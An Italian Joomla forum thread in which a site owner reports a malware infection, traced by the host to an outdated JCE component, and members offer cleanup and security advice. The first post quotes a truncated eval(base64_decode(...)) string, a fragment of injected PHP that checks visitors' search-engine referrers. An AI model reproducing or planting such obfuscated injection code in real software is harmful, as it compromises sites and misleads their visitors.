Back to top

Autore Topic: Malware sul mio sito  (Letto 2566 volte)

Offline sdenghete

  • Appassionato
  • ***
  • Post: 286
    • Mostra profilo
Malware sul mio sito
« il: 05 Mar 2013, 19:26:25 »
Direte: ecco l'ennesimo attaccato dal Malware.
L'ho scoperto oggi dopo che google me lo ha comunicato. (ma il fatto risale al 11 gennaio scorso)
Il server che mi ospita (joomlahost) mi ha detto che alcuni file contengono questa stringa:
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokbmNjdj1 oZWFkZXJzX3NlbnQoKTsNCmlmICghJG5jY3Ypew 0KJHJlZmVyZXI9JF9TRVJWRVJbJ0hUVFBfUkVGR VJFUiddOw0KJHVhPSRfU0VSVkVSWydIVFRQX1VT RVJfQUdFTlQnXTsNCmlmIChzdHJpc3RyKCRyZWZ lcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZm VyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlc mVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVm ZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmV yZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZW ZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZ mVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVm ZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJ lZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0ci gkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb 3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikg b3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5 jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC 5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmxcP3NhLyIsJHJlZmVyZXIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbS

Ho aperto e pulito tutti quelli presenti nella cartella Includes come indicatomi ma facendo la scansione con il programma online  risulta che il codice è ancora presente.
Il mio backup risale a Aprile 2012 e se ripristino da questo, perdo tutto il lavoro che sto facendo sul Jupgrade.
Che faccio? urge un aiuto colossale sennò stasera mi suicido! :-\
Grazie a tutti

Offline hapax

  • Instancabile
  • ******
  • Post: 3005
  • Sesso: Maschio
    • Mostra profilo
Re:Malware sul mio sito
« Risposta #1 il: 05 Mar 2013, 19:39:02 »
Che faccio? urge un aiuto colossale sennò stasera mi suicido! :-\

...per così poco...  ???

hai controllato se all'interno del file index.php è presente quel codice

o qualcosaltro che lo richiami

...per curiosità...che versione di joomla utilizzi?

ciao

- scegliere con attenzione la sezione in cui aprire la discussione
- descrivere l'ambiente in cui si verifica il problema (se il problema è su un sito remoto inserite il link al sito)
- se il problema viene poi risolto, metti per cortesia [RISOLTO]

Offline sdenghete

  • Appassionato
  • ***
  • Post: 286
    • Mostra profilo
Re:Malware sul mio sito
« Risposta #2 il: 05 Mar 2013, 19:54:06 »
ciao, sembra poco, sono nel pallone più totale, credimi.
uso questa versione  1.5.26
L'ho trovato ancora in altri file....mannaggia :-(
ora provo di nuovo con la scansione



Offline sdenghete

  • Appassionato
  • ***
  • Post: 286
    • Mostra profilo
Re:Malware sul mio sito
« Risposta #3 il: 06 Mar 2013, 19:32:19 »
due giorni da massacro. Non so quanti files .php controllati. Un lavoro immane....
Il reparto tecnico di Joomlahost mi ha detto che:
La violazione è avvenuta da un componente JCE non aggiornato. Le consigliamo di installare il componente JCE versione 2.3.1 unica stabile


Ho fatto l'upgrade alla 2.3.1.1, speriamo che google mi riabiliti al più presto!!!!

mau_develop

  • Visitatore
Re:Malware sul mio sito
« Risposta #4 il: 06 Mar 2013, 19:43:20 »
http://www.joomla.it/notizie/6983-la-vera-sicurezza-per-il-tuo-sito-joomla-e-il-tuo-atteggiamento.html
... c'è anche quello, bisognerebbe frequentare e leggere non solo quando si hanno dei problemi ;)

Offline sdenghete

  • Appassionato
  • ***
  • Post: 286
    • Mostra profilo
Re:Malware sul mio sito
« Risposta #5 il: 06 Mar 2013, 19:54:27 »
è verissimo, ma bisogna avere una giornata di 36 ore per fare tutto bene, il lavoro, il sito.....

Offline hapax

  • Instancabile
  • ******
  • Post: 3005
  • Sesso: Maschio
    • Mostra profilo
Re:Malware sul mio sito
« Risposta #6 il: 08 Mar 2013, 13:14:26 »
Ho fatto l'upgrade alla 2.3.1.1, speriamo che google mi riabiliti al più presto!!!!

...hai richiesto da "strumenti webmatser" di google la riconsiderazione del sito?

è verissimo, ma bisogna avere una giornata di 36 ore per fare tutto bene, il lavoro, il sito.....

...anche con una da 24...basta iscriversi alla newsletter del sito
e ricevere direttamente nella casella di posta...tutte le notizie
..tra cui quella linkata da @M_W_C

ciao

 ;)
- scegliere con attenzione la sezione in cui aprire la discussione
- descrivere l'ambiente in cui si verifica il problema (se il problema è su un sito remoto inserite il link al sito)
- se il problema viene poi risolto, metti per cortesia [RISOLTO]

 



Web Design Bolzano Kreatif